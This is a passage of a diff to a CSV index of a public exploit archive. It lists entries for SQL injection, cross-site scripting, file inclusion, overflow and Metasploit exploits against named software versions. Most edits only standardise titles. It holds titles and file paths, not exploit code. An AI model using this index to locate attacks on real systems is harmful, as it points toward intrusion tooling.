+26599,platforms/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 +26600,platforms/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 26601,platforms/linux/dos/26601.pl,"Unalz 0.x Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0 26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 send.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 messages.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -23766,7 +23766,7 @@ id,file,description,date,author,platform,type,port 26640,platforms/php/webapps/26640.txt,"GuppY 4.5 archbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26641,platforms/php/webapps/26641.txt,"GuppY 4.5 dbbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26642,platforms/php/webapps/26642.txt,"GuppY 4.5 nwlmail.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Include",2005-11-28,r0t,php,webapps,0 +26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,php,webapps,0 26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 - Multiple Products Cross-Site Scripting Vulnerabilities",2005-11-28,r0t,php,webapps,0 26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 Default.ASP SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 26646,platforms/php/webapps/26646.txt,"PHP Upload Center Index.php Directory Traversal",2005-11-29,liz0,php,webapps,0 @@ -23791,7 +23791,7 @@ id,file,description,date,author,platform,type,port 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos,0 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 Index.php SQL Injection",2005-11-30,r0t,php,webapps,0 -26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Include",2005-11-30,r0t3d3Vil,php,webapps,0 +26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps,0 26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 buyoffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 products.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 @@ -23886,7 +23886,7 @@ id,file,description,date,author,platform,type,port 26763,platforms/cfm/webapps/26763.txt,"Magic List Pro view_archive.cfm ListID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 26764,platforms/cfm/webapps/26764.txt,"Magic Forum Personal view_forum.cfm ForumID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal view_thread.cfm Multiple Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 -26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 Index.CFM Local File Include",2005-12-08,r0t,cfm,webapps,0 +26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 Index.CFM Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 Index.CFM Cross-Site Scripting Vulnerabilities",2005-12-08,r0t,cfm,webapps,0 26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 Cal_make.PL Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0 26769,platforms/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption",2005-12-08,fearwall,windows,dos,0 @@ -23957,7 +23957,7 @@ id,file,description,date,author,platform,type,port 26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-commerce index.php page Parameter XSS",2005-12-15,B3g0k,php,webapps,0 26839,platforms/php/webapps/26839.txt,"TML 0.5 index.php form Parameter XSS",2005-12-15,X1ngBox,php,webapps,0 26840,platforms/php/webapps/26840.txt,"TML 0.5 index.php id Parameter SQL Injection",2005-12-15,X1ngBox,php,webapps,0 -26841,platforms/php/webapps/26841.txt,"MarmaraWeb E-Commerce Remote File Include",2005-12-15,B3g0k,php,webapps,0 +26841,platforms/php/webapps/26841.txt,"MarmaraWeb E-Commerce Remote File Inclusion",2005-12-15,B3g0k,php,webapps,0 26842,platforms/cgi/webapps/26842.txt,"Sitenet BBS 2.0 netboardr.cgi Multiple Parameter XSS",2005-12-15,r0t3d3Vil,cgi,webapps,0 26843,platforms/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - search.cgi cid Parameter XSS",2005-12-15,r0t3d3Vil,cgi,webapps,0 26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script Page Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps,0 @@ -24034,10 +24034,10 @@ id,file,description,date,author,platform,type,port 26915,platforms/linux/dos/26915.txt,"Blender BlenLoader 2.x File Processing Integer Overflow",2005-12-20,"Damian Put",linux,dos,0 26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 Main.php SQL Injection",2005-12-20,"Attila Gerendi",php,webapps,0 26917,platforms/cgi/webapps/26917.txt,"LiveJournal Cleanhtml.PL HTML Injection",2005-12-20,"Andrew Farmer",cgi,webapps,0 -26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Include Vulnerabilities",2005-12-20,"Security .Net Information",php,webapps,0 +26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion Vulnerabilities",2005-12-20,"Security .Net Information",php,webapps,0 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0 -26921,platforms/php/webapps/26921.txt,"Tolva 0.1 Usermods.php Remote File Include",2005-12-21,xbefordx,php,webapps,0 +26921,platforms/php/webapps/26921.txt,"Tolva 0.1 Usermods.php Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 26922,platforms/multiple/dos/26922.pl,"Interaction SIP Proxy 3.0 - Remote Heap Corruption Denial of Service",2005-12-21,"Behrang Fouladi",multiple,dos,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps,0 @@ -24114,7 +24114,7 @@ id,file,description,date,author,platform,type,port 26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 -26998,platforms/php/webapps/26998.txt,"OABoard 1.0 Forum Script Remote File Include",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 +26998,platforms/php/webapps/26998.txt,"OABoard 1.0 Forum Script Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 26999,platforms/php/webapps/26999.txt,"PHPBook 1.x Mail Field PHP Code Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27000,platforms/php/webapps/27000.txt,"VEGO Web Forum 1.x Theme_ID SQL Injection",2005-12-28,"Aliaksandr Hartsuyeu",php,webapps,0 27001,platforms/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24171,7 +24171,7 @@ id,file,description,date,author,platform,type,port 27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 27046,platforms/windows/remote/27046.rb,"VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 -27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Include",2006-01-09,Xez,php,webapps,0 +27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 @@ -24187,7 +24187,7 @@ id,file,description,date,author,platform,type,port 27061,platforms/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps,0 27062,platforms/cgi/webapps/27062.txt,"Hummingbird Collaboration Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",cgi,webapps,0 27063,platforms/asp/webapps/27063.txt,"WebWiz Forums Search_form.ASP Cross-Site Scripting",2006-01-10,nukedx,asp,webapps,0 -27064,platforms/php/webapps/27064.txt,"Orjinweb Index.php Remote File Include",2006-01-10,serxwebun,php,webapps,0 +27064,platforms/php/webapps/27064.txt,"Orjinweb Index.php Remote File Inclusion",2006-01-10,serxwebun,php,webapps,0 27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu - -c Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27067,platforms/php/webapps/27067.txt,"MyPHPim calendar.php3 cal_id Parameter SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24276,7 +24276,7 @@ id,file,description,date,author,platform,type,port 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 Userlogin.ASP SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 -27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 Loginout.php Remote File Include",2006-01-31,"Hamid Ebadi",php,webapps,0 +27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 Index.php Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 Username Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injection Vulnerabilities",2006-02-01,Siegfried,php,webapps,0 @@ -24359,7 +24359,7 @@ id,file,description,date,author,platform,type,port 27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - Private.php Multiple SQL Injection Vulnerabilities",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 Index.php Remote File Include",2006-02-16,ReZEN,php,webapps,0 +27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 Index.php Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injection Vulnerabilities",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 Managegroup.php SQL Injection",2006-02-16,imei,php,webapps,0 27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 @@ -24382,8 +24382,8 @@ id,file,description,date,author,platform,type,port 27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0 -27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Include",2006-02-22,trueend5,php,webapps,0 -27262,platforms/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 Index.php Remote File Include",2006-02-22,trueend5,php,webapps,0 +27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps,0 +27262,platforms/php/webapps/27262.txt,"Noah's Classifieds 1.0/1.3 Index.php Remote File Inclusion",2006-02-22,trueend5,php,webapps,0 27263,platforms/php/webapps/27263.txt,"Dragonfly CMS 9.0.6 1 - Your_Account Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27264,platforms/php/webapps/27264.txt,"Dragonfly CMS 9.0.6 1 - News Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27265,platforms/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 - Stories_Archive Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 @@ -24402,7 +24402,7 @@ id,file,description,date,author,platform,type,port 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 -27279,platforms/php/webapps/27279.txt,"vtiger CRM <= 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 +27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b (pages.php page_name param) - SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 @@ -24419,7 +24419,7 @@ id,file,description,date,author,platform,type,port 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,Metasploit,unix,remote,7443 27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,Metasploit,windows,local,0 -27297,platforms/linux/local/27297.c,"Linux Kernel <= 3.7.6 (Redhat x86/x64) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,linux,local,0 +27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (Redhat x86/x64) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,linux,local,0 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.php SQL Injection",2006-02-23,ReZEN,php,webapps,0 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS",2006-02-23,rgod,php,webapps,0 @@ -24433,7 +24433,7 @@ id,file,description,date,author,platform,type,port 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - reviews.php letter Parameter XSS",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - download.php dcategory Parameter XSS",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 Failure.ASP Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 -27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 Scan_Lang_Insert.php Local File Include",2006-02-25,"NSA Group",php,webapps,0 +27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 Scan_Lang_Insert.php Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 basket.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 cat.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 @@ -24467,7 +24467,7 @@ id,file,description,date,author,platform,type,port 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 Profile.php Email Field HTML Injection",2006-03-02,imei,php,webapps,0 27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System - index.php Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 -27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Include",2006-03-02,botan,php,webapps,0 +27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 Show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 comment.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 contact.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 @@ -24479,7 +24479,7 @@ id,file,description,date,author,platform,type,port 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 Misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0 -27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x Common.php Remote File Include",2006-03-06,ERNE,php,webapps,0 +27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x Common.php Remote File Inclusion",2006-03-06,ERNE,php,webapps,0 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 Login.php Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27365,platforms/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service",2006-03-06,"Luigi Auriemma",multiple,dos,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 @@ -24517,7 +24517,7 @@ id,file,description,date,author,platform,type,port 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0 27399,platforms/php/webapps/27399.txt,"WordPress Booking Calendar 4.1.4 - CSRF",2013-08-07,"Dylan Irzi",php,webapps,0 27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0 -27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server <= 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 +27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0 27403,platforms/php/webapps/27403.txt,"WordPress Usernoise Plugin 3.7.8 - Persistent XSS",2013-08-07,RogueCoder,php,webapps,0 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps,0 @@ -24571,7 +24571,7 @@ id,file,description,date,author,platform,type,port 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board Mb.CGI SQL Injection",2006-03-24,kspecial,cgi,webapps,0 27465,platforms/php/webapps/27465.txt,"VihorDesign Index.php Cross-Site Scripting",2006-03-24,botan,php,webapps,0 -27466,platforms/php/webapps/27466.txt,"VihorDesign Index.php Remote File Include",2006-03-24,botan,php,webapps,0 +27466,platforms/php/webapps/27466.txt,"VihorDesign Index.php Remote File Inclusion",2006-03-24,botan,php,webapps,0 27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 Index.php Cross-Site Scripting",2006-03-27,botan,php,webapps,0 27468,platforms/php/webapps/27468.txt,"Nuked-Klan 1.x Index.php SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 email.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 @@ -24633,10 +24633,10 @@ id,file,description,date,author,platform,type,port 27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,Metasploit,multiple,remote,0 27531,platforms/php/webapps/27531.txt,"WordPress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 -27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.php Remote File Include",2006-03-30,"Morocco Security Team",php,webapps,0 +27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.php Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 Post.php SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - Searchresults.ASP Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 -27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c Index.php Remote File Include",2006-03-31,botan,php,webapps,0 +27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c Index.php Remote File Inclusion",2006-03-31,botan,php,webapps,0 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 login.php Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 register.php Multiple Field XSS",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24685,7 +24685,7 @@ id,file,description,date,author,platform,type,port 27586,platforms/php/webapps/27586.txt,"phpMyForum 4.0 index.php type Variable CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PhpWebGallery 1.4.1 category.php Multiple Parameter XSS",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PhpWebGallery 1.4.1 picture.php Multiple Parameter XSS",2006-04-10,Psych0,php,webapps,0 -27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 Spip_login.php Remote File Include",2006-04-10,cR45H3R,php,webapps,0 +27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 Spip_login.php Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 Modules.php Multiple SQL Injection Vulnerabilities",2005-04-10,r0t,php,webapps,0 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 @@ -24710,7 +24710,7 @@ id,file,description,date,author,platform,type,port 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 login.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 index.php Multiple Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27614,platforms/php/webapps/27614.txt,"ShopWeezle 2.0 memo.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 -27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Include",2006-04-11,SnIpEr_SA,php,webapps,0 +27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps,0 27616,platforms/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 thumbnail.php page Parameter XSS",2006-04-11,0o_zeus_o0,php,webapps,0 27617,platforms/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - gallery.php page Parameter XSS",2006-04-11,0o_zeus_o0,php,webapps,0 27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 slideshow.php name Parameter XSS",2006-04-11,0o_zeus_o0,php,webapps,0 @@ -24720,7 +24720,7 @@ id,file,description,date,author,platform,type,port 27622,platforms/php/webapps/27622.txt,"Dokeos 1.x Viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 -27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Include Vulnerabilities",2006-04-11,SnIpEr_SA,php,webapps,0 +27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusion Vulnerabilities",2006-04-11,SnIpEr_SA,php,webapps,0 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 27627,platforms/windows/remote/27627.txt,"Saxopress URL Parameter Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 Index.php SQL Injection",2006-04-11,LoK-Crew,php,webapps,0 @@ -24747,22 +24747,22 @@ id,file,description,date,author,platform,type,port 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.php Cross-Site Scripting",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 27969,platforms/multiple/dos/27969.c,"Quake 3 Engine CL_ParseDownload Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos,0 -27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 